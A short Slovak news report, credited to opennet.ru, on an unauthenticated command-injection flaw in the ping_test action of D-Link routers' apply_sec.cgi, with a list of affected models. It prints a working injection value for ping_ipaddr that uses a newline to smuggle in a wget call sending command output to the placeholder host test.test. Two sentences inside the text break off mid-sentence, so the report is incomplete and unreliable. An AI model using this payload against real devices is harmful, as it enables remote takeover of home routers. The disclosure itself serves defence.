V bezdrôtových smerovačoch D-Link
Je zaujímavé, že podľa vývojárov firmvéru by sa volanie „ping_test“ malo vykonať až po autentifikácii, ale v skutočnosti sa volá v každom prípade bez ohľadu na prihlásenie do webového rozhrania. Najmä pri prístupe k skriptu apply_sec.cgi a odovzdaní parametra „action=ping_test“ sa skript presmeruje na autentifikačnú stránku, ale súčasne vykoná akciu spojenú s ping_test. Na spustenie kódu bola použitá ďalšia zraniteľnosť v samotnom ping_teste, ktorá volá utilitu ping bez toho, aby správne skontrolovala správnosť IP adresy odoslanej na testovanie. Ak chcete napríklad zavolať pomocný program wget a preniesť výsledky príkazu „echo 1234“ do externého hostiteľa, stačí zadať parameter „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Prítomnosť zraniteľnosti bola oficiálne potvrdená v nasledujúcich modeloch:
- DIR-655 s firmvérom 3.02b05 alebo starším;
- DIR-866L s firmvérom 1.03b04 alebo starším;
- DIR-1565 s firmvérom 1.01 alebo starším;
- DIR-652 (neposkytujú sa žiadne informácie o problematických verziách firmvéru)
Doba podpory pre tieto modely už vypršala, preto D-Link
Neskôr sa zistilo, že zraniteľnosť bola tiež
Zdroj: opennet.ru